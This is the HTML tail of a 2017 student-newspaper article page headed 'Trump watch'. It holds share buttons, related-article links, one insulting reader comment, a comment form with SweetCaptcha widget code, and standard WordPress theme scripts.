		load('//platform.twitter.com/widgets.js', 'tweetjs');
	  }
	  if (w.addEventListener) { w.addEventListener("load", go, false); }
	  else if (w.attachEvent) { w.attachEvent("onload",go); }
	}(window, document, 'script'));
	</script>
	<ul>			
			<li><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://thelumberjack.org/2017/02/08/trump-watch/" data-text="Trump watch" data-via="" data-lang="en">tweet</a></li>
				<li>
			<div id="fb-root"></div>
			<div class="fb-like" data-href="http://thelumberjack.org/2017/02/08/trump-watch/" data-send="false" data-layout="button_count" data-width="90" data-show-faces="false"></div>
		</li>
				<li style="width:80px;"><div class="g-plusone" data-size="medium" data-href="http://thelumberjack.org/2017/02/08/trump-watch/"></div>
		</li>
				<li><su:badge layout="2" location="http://thelumberjack.org/2017/02/08/trump-watch/"></su:badge>
			<script type="text/javascript">
				(function() {
					var li = document.createElement('script'); li.type = 'text/javascript'; li.async = true;
					li.src = ('https:' == document.location.protocol ? 'https:' : 'http:') + '//platform.stumbleupon.com/1/widgets.js';
					var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(li, s);
				})();
			</script>
		</li>
				<li><script src="http://platform.linkedin.com/in.js" type="text/javascript"></script><script type="IN/Share" data-url="http://thelumberjack.org/2017/02/08/trump-watch/" data-counter="right"></script></li>
				<li style="width:80px;"><script type="text/javascript" src="http://assets.pinterest.com/js/pinit.js"></script><a href="http://pinterest.com/pin/create/button/?url=http://thelumberjack.org/2017/02/08/trump-watch/&amp;media=" class="pin-it-button" count-layout="horizontal"><img border="0" src="http://assets.pinterest.com/images/PinExt.png" title="Pin It" /></a></li>
		</ul>
	<div class="clear"></div>
</div> <!-- .share-post -->				
			</div><!-- .post-inner -->
		</article><!-- .post-listing -->
		<p class="post-tag">Tagged with: <a href="http://thelumberjack.org/tag/betsy-devos/" rel="tag">betsy devos</a> <a href="http://thelumberjack.org/tag/devos/" rel="tag">devos</a> <a href="http://thelumberjack.org/tag/shulkin/" rel="tag">shulkin</a> <a href="http://thelumberjack.org/tag/trump-golfing/" rel="tag">trump golfing</a> <a href="http://thelumberjack.org/tag/trump-watch/" rel="tag">trump watch</a></p>
		
				
						
		<div class="post-navigation">
			<div class="post-previous"><a href="http://thelumberjack.org/2017/02/08/mellow-out-with-meditation/" rel="prev"><span>Previous:</span> Mellow out with meditation</a></div>
			<div class="post-next"><a href="http://thelumberjack.org/2017/02/08/this-week-in-news-2/" rel="next"><span>Next:</span> This week in news</a></div>
		</div><!-- .post-navigation -->
				
		
			<section id="related_posts">
		<div class="block-head">
			<h3>Related Articles</h3><div class="stripe-line"></div>
		</div>
		<div class="post-listing">
						<div class="related-item">
							
				<div class="post-thumbnail">
					<a href="http://thelumberjack.org/2017/02/08/a-master-plan-for-free-tuition/" title="Permalink to A master plan for free tuition" rel="bookmark">
						<img width="300" height="160" src="http://thelumberjack.org/wp-content/uploads/2017/01/News-Black-and-White-Background-300x160.png" class="attachment-tie-large size-tie-large wp-post-image" alt="" srcset="http://thelumberjack.org/wp-content/uploads/2017/01/News-Black-and-White-Background-300x160.png 300w, http://thelumberjack.org/wp-content/uploads/2017/01/News-Black-and-White-Background-620x330.png 620w" sizes="(max-width: 300px) 100vw, 300px" />											</a>
				</div><!-- post-thumbnail /-->
							
				<h3><a href="http://thelumberjack.org/2017/02/08/a-master-plan-for-free-tuition/" title="Permalink to A master plan for free tuition" rel="bookmark">A master plan for free tuition</a></h3>
				<p class="post-meta"><span class="tie-date">15 hours ago</span></p>
			</div>
						<div class="related-item">
							
				<h3><a href="http://thelumberjack.org/2017/02/08/the-moodle-to-canvas-switch/" title="Permalink to The Moodle to Canvas switch" rel="bookmark">The Moodle to Canvas switch</a></h3>
				<p class="post-meta"><span class="tie-date">15 hours ago</span></p>
			</div>
						<div class="related-item">
							
				<h3><a href="http://thelumberjack.org/2017/02/08/this-week-in-news-2/" title="Permalink to This week in news" rel="bookmark">This week in news</a></h3>
				<p class="post-meta"><span class="tie-date">15 hours ago</span></p>
			</div>
						<div class="clear"></div>
		</div>
	</section>
		

		
				<div id="comments">

			<h3 id="comments-title">
			One comment			</h3>

										<ol class="commentlist">	<li id="comment-36807">
		<div  class="comment even thread-even depth-1 comment-wrap" >
			<div class="comment-avatar"><img alt='' src='http://0.gravatar.com/avatar/6472b11040a188caa3cb8cdc761753e2?s=45&#038;d=mm&#038;r=g' srcset='http://0.gravatar.com/avatar/6472b11040a188caa3cb8cdc761753e2?s=90&amp;d=mm&amp;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></div>
			<div class="author-comment">
				<cite class="fn">ralph</cite> 				<div class="comment-meta commentmetadata"><a href="http://thelumberjack.org/2017/02/08/trump-watch/#comment-36807">	February 8, 2017 at 8:22 am</a></div><!-- .comment-meta .commentmetadata -->
			</div>
			<div class="clear"></div>
			<div class="comment-content">
									
				<p>the radicalized media hysterical anti-Trumpsters drama queens are the whiniest bunch of sore loser bitches this country has ever seen.  Spoiled Baby Privilage. The election is over. Get a job and pay your taxes and vote and STFU morons.</p>
			</div>
			<div class="reply"><a rel='nofollow' class='comment-reply-link' href='http://thelumberjack.org/2017/02/08/trump-watch/?replytocom=36807#respond' onclick='return addComment.moveForm( "comment-36807", "36807", "respond", "16055" )' aria-label='Reply to ralph'>Reply</a></div><!-- .reply -->
		</div><!-- #comment-##  -->

	</li><!-- #comment-## -->
</ol>
			    
							


	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/2017/02/08/trump-watch/#respond" style="display:none;">Cancel reply</a></small></h3>			<form action="http://thelumberjack.org/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes">Your email address will not be published. Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><label for="comment">Comment</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" aria-required="true" required="required"></textarea></p><p class="comment-form-author"><label for="author">Name</label> <span class="required">*</span><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email</label> <span class="required">*</span><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="cptch_block"><span class="cptch_wrap">
				<label class="cptch_label" for="cptch_input_22">
					<span class="cptch_span"><input id="cptch_input_22" class="cptch_input cptch_wp_comments" type="text" autocomplete="off" name="cptch_number" value="" maxlength="2" size="2" aria-required="true" required="required" style="margin-bottom:0;display:inline;font-size: 12px;width: 40px;" /></span>
					<span class="cptch_span">&nbsp;&times;&nbsp;</span>
					<span class="cptch_span">&#110;&#105;ne</span>
					<span class="cptch_span">&nbsp;=&nbsp;</span>
					<span class="cptch_span">27</span>
					<input type="hidden" name="cptch_result" value="Lu0=" />
					<input type="hidden" name="cptch_time" value="1486628606" />
					<input type="hidden" name="cptch_form" value="wp_comments" />
				</label><span class="cptch_reload_button_wrap hide-if-no-js">
					<noscript>
						<style type="text/css">
							.hide-if-no-js {
								display: none !important;
							}
						</style>
					</noscript>
					<span class="cptch_reload_button dashicons dashicons-update"></span>
				</span></span></p><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='16055' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>
	<style type='text/css'>[draggable]{-moz-user-select:none;-khtml-user-select:none;-webkit-user-select:none;user-select:none;-khtml-user-drag:element;-webkit-user-drag:element}div.sweetcaptcha,div.sweetcaptcha *{margin:0;padding:0;font-size:12px;font-family:arial,helvetica,sans-serif;line-height:normal}div.sweetcaptcha{-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px;background:#f5f5f5;color:#000;padding:10px;margin-bottom:10px;overflow:hidden;min-height:120px;max-width:350px;position:relative;font-weight:400}div.sweetcaptcha ul{list-style-type:none!important;margin:0!important;padding:0!important}div.sweetcaptcha ul li{clear:none !important;background:#cad9e8;display:inline-block;border-radius:5px;margin:0 4px 4px 0!important;z-index:2;float:left;list-style-type:none!important;width:42px;height:42px}div.sweetcaptcha.rtl ul li{padding:0 0 0 4px!important;float:right}div.sweetcaptcha ul li.selected{background:none;position:absolute;top:5px;text-align:right;right:0;-webkit-animation:selected 500ms linear forwards;-moz-animation:selected 500ms linear forwards;-ms-animation:selected 500ms linear forwards;-o-animation:selected 500ms linear forwards;animation:selected 500ms linear forwards}div.sweetcaptcha.rtl ul li.selected{position:absolute;top:5px;left:5px;text-align:left;-webkit-animation:selected_rtl 500ms linear forwards;-moz-animation:selected_rtl 500ms linear forwards;-ms-animation:selected_rtl 500ms linear forwards;-o-animation:selected_rtl 500ms linear forwards;animation:selected_rtl 500ms linear forwards}div.sweetcaptcha ul li.static_selected{background:none;position:absolute;right:0;text-align:right;top:5px}div.sweetcaptcha.rtl ul li.static_selected{position:absolute;left:5px;top:5px}div.sweetcaptcha ul li.static_selected img{width:25px;height:25px}div.sweetcaptcha img{margin:0;padding:0;background:0 0}div.sweetcaptcha ol li img,div.sweetcaptcha ul li img{display:inline}div.sweetcaptcha p{padding-bottom:10px;color:#000}div.sweetcaptcha .reset{color:#a00;font-size:10px;clear:both;cursor:pointer;padding-top:3px;float:left}div.sweetcaptcha #sc2powered{position:absolute;bottom:2px;right:4px;padding:2px 4px;z-index:2;background:url(//sweetcaptcha.s3.amazonaws.com/widget/v2/strip.png?1) no-repeat right top;padding-right:14px;text-align:right;white-space:nowrap;margin-right:1px}div.sweetcaptcha #sc2powered #scwpowered{display:none}div.sweetcaptcha #sc2powered,div.sweetcaptcha #sc2powered *{font-size:9px;color:#111;text-decoration:none}div.sweetcaptcha span.holder{background-repeat:no-repeat;background-position:center right;display:block;width:90px;height:100px;float:right;z-index:1;margin:2px}div.sweetcaptcha p{direction:ltr;text-align:left}div.sweetcaptcha ul{text-align:left;display:block!important}div.sweetcaptcha.rtl p{direction:rtl;text-align:right}div.sweetcaptcha.rtl span.holder{right:auto;left:10px;background-position:bottom left}div.sweetcaptcha.rtl ul{text-align:right}div.sweetcaptcha.rtl #sc2powered{right:auto;left:0}div.sweetcaptcha.rtl .reset{float:right}div.sweetcaptcha #sc2powered span{position:relative;margin-left:-2px;font-weight:700}@-moz-keyframes selected{0%{opacity:0}25%{top:-50px;right:0;opacity:0}100%{top:5px;right:0;opacity:1}}@-ms-keyframes selected{0%{opacity:0}25%{top:-50px;right:0;opacity:0}100%{top:5px;right:0;opacity:1}}@-o-keyframes selected{0%{opacity:0}25%{top:-50px;right:0;opacity:0}100%{top:5px;right:0;opacity:1}}@-webkit-keyframes selected{0%{opacity:0}25%{top:-50px;right:0;opacity:0}100%{top:5px;right:0;opacity:1}}@keyframes selected{0%{opacity:0}25%{top:-50px;left:5px;opacity:0}100%{top:5px;left:5px;opacity:1}}@-moz-keyframes selected_rtl{0%{opacity:0}25%{top:-50px;left:5px;opacity:0}100%{top:5px;left:5px;opacity:1}}@-ms-keyframes selected_rtl{0%{opacity:0}25%{top:-50px;left:5px;opacity:0}100%{top:5px;left:5px;opacity:1}}@-o-keyframes selected_rtl{0%{opacity:0}25%{top:-50px;left:5px;opacity:0}100%{top:5px;left:5px;opacity:1}}@-webkit-keyframes selected_rtl{0%{opacity:0}25%{top:-50px;left:5px;opacity:0}100%{top:5px;left:5px;opacity:1}}@keyframes selected_rtl{0%{opacity:0}25%{top:-50px;left:5px;opacity:0}100%{top:5px;left:5px;opacity:1}}</style>
	<div class='sweetcaptcha' id='sc_072dac6'>
		<div id='sc_072dac6_widget' ondragover='false' ondrop='false' draggable></div>
		<div id='sc2powered'><div>Powered by sweet <a href='https://sweetcaptcha.com/?ref=widget' target='_blank' style='margin-left: -3px; font-weight: bold'>Captcha</a></div></div><a href='http://sweetcontactform.com/' style='display: none'>contact form</a> <a href='http://sweetcontactform.com/' style='display: none'>WordPress contact form</a> <a href='http://sweetcontactform.com/' style='display: none'>contact form for WordPress</a> 
	</div>
	<script src="//code.jquery.com/jquery-1.10.2.min.js"></script>
	<script>var sc_jQuery = jQuery.noConflict(true)</script>
		<script type='text/javascript'>!function(e){function n(e,n){var t,a="";n=decodeURIComponent(n);for(var r=n.length-1;r>=0;r--)t=n.charAt(r),a+=t>="a"&&"z">=t||t>="A"&&"Z">=t?String.fromCharCode(65+e.indexOf(t)%26):t;return a.toLowerCase()}if("undefined"==typeof SWEETCAPTCHA){var t="undefined"!=typeof window.orientation||navigator.userAgent.match(/iphone|ipod|blackberry|android|palm|windows\s+ce|mobile|msie 8|msie 7|msie 6/i)||navigator.userAgent.indexOf("Safari")>-1&&-1==navigator.userAgent.indexOf("Chrome")&&navigator.userAgent.indexOf("Windows")>-1,a=!t,r=a?"drag":"click";SWEETCAPTCHA=function(i,o){function s(t){function o(e){d||(d=!0,e[0].className=a?"selected":"static_selected",e[0].childNodes[0].width=25,e[0].childNodes[0].height=25,m.val(e.attr("data-hash").substr(5,10)),t.auto_submit&&u.closest("form").trigger("submit"))}"click"===t.behavior&&(r="click"),d=!1;for(var s,u=e("#"+i+"_widget"),l=e('<span class="holder" />').css("backgroundImage","url("+n(t.simple_key,t.q)+")"),p=e("<p />").html(t[r].verify+"<br />"+t[r].challenge),f=e('<a class="reset" />').html(t[r].reset).click(c.generate),h=e("<ul />"),g=[],v=0,v=0;v<t.a.length;v++)!function(){var a=e('<img height="42" width="42" />').attr("src",n(t.simple_key,t.a[v].src));g[v]=e('<li data-hash="'+t.a[v].hash+'" />').append(a),h.append(g[v])}(v);var m=e('<input type="hidden" name="scvalue" value="0" />');u.empty().append(l).append(p).append(h).append(f).append('<input type="hidden" name="sckey" value="'+t.k+'" />').append(m).append('<input type="hidden" name="scvalue2" value="0" />').parent().addClass(t[r].direction),a&&(l.on("dragenter",function(e){return e.preventDefault&&e.preventDefault(),!0}),l.on("dragover",function(e){e.preventDefault&&e.preventDefault()}),l.on("drop",function(e){return e.preventDefault&&e.preventDefault(),o(s),!0}));for(var v in g)!function(e){a?(g[e][0].setAttribute("draggable","true"),g[e].on("dragstart",function(){return s=g[e],!0})):g[e].on("click",function(){o(g[e])})}(v)}var d,c=this;return this.generate=function(){e.ajax({url:o+"&mobile="+(t?"1":"0"),jsonp:"callback",dataType:"jsonp",success:function(e){s(e)}})},this}}}(sc_jQuery);</script>
	<script>new SWEETCAPTCHA('sc_072dac6', '//www.sweetcaptcha.com/api/v2/apps/33363/captcha/sc_072dac6?auto_submit=false').generate()</script><script type='text/javascript' src='//www.sweetcaptcha.com/javascripts/sclytics.js'></script><div id="sweetcaptcha-submit-button" class="form-submit"><br /></div><script type="text/javascript">var sub = document.getElementById("submit");if (sub!=undefined){sub.parentNode.removeChild(sub);document.getElementById("sweetcaptcha-submit-button").appendChild (sub);document.getElementById("submit").tabIndex = 6;}</script><script type="text/javascript">document.getElementById("respond").style.overflow="visible";</script>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments -->
	
	</div><!-- .content -->
<aside class="sidebar-narrow">
</aside>
</div> <!-- .content-wrap -->
<aside class="sidebar">
</aside>
<div class="clear"></div>
		<div class="clear"></div>
	</div><!-- .container /-->
	
		</div><!-- .container -->

	<footer class="fade-in animated4">
	<div id="footer-widget-area" class="footer-3c container">

	
	

	
		
	</div><!-- #footer-widget-area -->
	<div class="clear"></div>
</footer><!-- .Footer /-->
				
	<div class="clear"></div>
	<div class="footer-bottom fade-in animated4">
		<div class="container">
					<div class="social-icons icon_flat">
		<a class="ttip" title="Facebook" href="http://www.facebook.com/HSULumberjack" target="_blank"><i class="tieicon-facebook"></i></a><a class="ttip" title="Twitter" href="http://twitter.com/HSULumberjack" target="_blank"><i class="tieicon-twitter"></i></a><a class="ttip" title="Flickr" href="http://flickr.com/thejacknews" target="_blank"><i class="tieicon-flickr"></i></a><a class="ttip" title="Tumblr" href="http://hsulumberjack.tumblr.com/" target="_blank"><i class="tieicon-tumblr"></i></a><a class="ttip" title="instagram" href="http://instagram.com/hsulumberjack" target="_blank"><i class="tieicon-instagram"></i></a>	</div>

			<div class="alignleft">
			© Copyright 2013, All Rights Reserved. | Powered by <a href="http://www.wordpress.com">WordPress</a> | Designed by <a href="http://www.tielabs.com">Tielabs</a>			</div>
		</div><!-- .Container -->
	</div><!-- .Footer bottom -->
	
</div><!-- .Wrapper -->
	<div id="topcontrol" class="tieicon-up-open" title="Scroll To Top"></div>
		<script>
		( function ( body ) {
			'use strict';
			body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' );
		} )( document.body );
		</script>
		<script type='text/javascript'> /* <![CDATA[ */var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done"}};/* ]]> */ </script><script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/droppable.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/slider.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/button.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/spinner.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/effect.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/effect-shake.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/themes/jarida/js/tie-scripts.js?ver=4.7.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/comment-reply.min.js?ver=4.7.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/wp-embed.min.js?ver=4.7.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var cptch_vars = {"nonce":"de7c5a3f31","ajaxurl":"http:\/\/thelumberjack.org\/wp-admin\/admin-ajax.php","enlarge":"0"};
/* ]]> */
</script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/captcha/js/front_end_script.js?ver=4.7.1'></script>
<script type="text/css" id="tmpl-tribe_customizer_css">.tribe-events-list .tribe-events-loop .tribe-event-featured,
				.tribe-events-list #tribe-events-day.tribe-events-loop .tribe-event-featured,
				.type-tribe_events.tribe-events-photo-event.tribe-event-featured .tribe-events-photo-event-wrap,
				.type-tribe_events.tribe-events-photo-event.tribe-event-featured .tribe-events-photo-event-wrap:hover {
					background-color: #0ea0d7;
				}

				#tribe-events-content table.tribe-events-calendar .type-tribe_events.tribe-event-featured {
					background-color: #0ea0d7;
				}

				.tribe-events-list-widget .tribe-event-featured,
				.tribe-events-venue-widget .tribe-event-featured,
				.tribe-mini-calendar-list-wrapper .tribe-event-featured,
				.tribe-events-adv-list-widget .tribe-event-featured .tribe-mini-calendar-event {
					background-color: #0ea0d7;
				}

				.tribe-grid-body .tribe-event-featured.tribe-events-week-hourly-single {
					background-color: rgba(14,160,215, .7 );
					border-color: #0ea0d7;
				}

				.tribe-grid-body .tribe-event-featured.tribe-events-week-hourly-single:hover {
					background-color: #0ea0d7;
				}</script><style type="text/css" id="tribe_customizer_css">.tribe-events-list .tribe-events-loop .tribe-event-featured,
				.tribe-events-list #tribe-events-day.tribe-events-loop .tribe-event-featured,
				.type-tribe_events.tribe-events-photo-event.tribe-event-featured .tribe-events-photo-event-wrap,
				.type-tribe_events.tribe-events-photo-event.tribe-event-featured .tribe-events-photo-event-wrap:hover {
					background-color: #0ea0d7;
				}

				#tribe-events-content table.tribe-events-calendar .type-tribe_events.tribe-event-featured {
					background-color: #0ea0d7;
				}

				.tribe-events-list-widget .tribe-event-featured,
				.tribe-events-venue-widget .tribe-event-featured,
				.tribe-mini-calendar-list-wrapper .tribe-event-featured,
				.tribe-events-adv-list-widget .tribe-event-featured .tribe-mini-calendar-event {
					background-color: #0ea0d7;
				}

				.tribe-grid-body .tribe-event-featured.tribe-events-week-hourly-single {
					background-color: rgba(14,160,215, .7 );
					border-color: #0ea0d7;
				}

				.tribe-grid-body .tribe-event-featured.tribe-events-week-hourly-single:hover {
					background-color: #0ea0d7;
				}</style></body>
</html>